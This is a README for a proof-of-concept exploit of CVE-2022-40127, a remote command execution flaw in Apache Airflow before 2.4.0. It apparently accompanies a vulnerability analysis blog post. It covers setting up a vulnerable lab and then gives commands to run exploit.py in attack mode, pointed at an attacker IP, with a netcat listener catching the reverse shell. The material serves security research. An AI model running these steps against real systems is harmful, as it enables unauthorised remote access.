PoC for CVE-2022-40127 that is an Apache Airflow RCE vulnerability affecting versions prior to 2.4.0.
The official report description says:
A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0.
The repo is created for a CVE analysis blog post available on vsociety blog.
proof.mp4
You can clone the repo:
git clone https://github.com/jakabakos/CVE-2022-40127.git
Download the docker-compose file from the official repo
cd /opt/
mkdir airflow-2.3.4 && cd airflow-2.3.4
curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.3.4/docker-compose.yaml'
Run Airflow
mkdir -p ./dags ./logs ./plugins
echo -e "AIRFLOW_UID=$(id -u)" > .env
docker-compose up airflow-init
docker-compose up
open localhost:8080
In this case both the username and password will be airflow
.
Based on the official install instructions:
pip3.8 install "apache-airflow==2.3.4" --constraint "https://raw.githubusercontent.com/apache/airflow/constraints-2.3.4/constraints-3.7.txt"
You can verify if the installation was successful with commands which airflow
and/or airflow info
.
Run Airflow
airflow standalone
See the generated password and username in the logs.
First, install the required packeges with pip:
pip3 install -r requirements.txt
See the possible options with:
python3 exploit.py --help
You can check if the host can be exploited or not:
python3 exploit.py -u airflow -p airflow -url http://localhost:8080
Set up a local listener for the reverse shell in a different terminal session:
nc -lvnp 4242
Run the script in attack mode with this command:
python3 exploit.py -u airflow -p airflow -url http://localhost:8080 -a -host <attacker_ip> -port 4242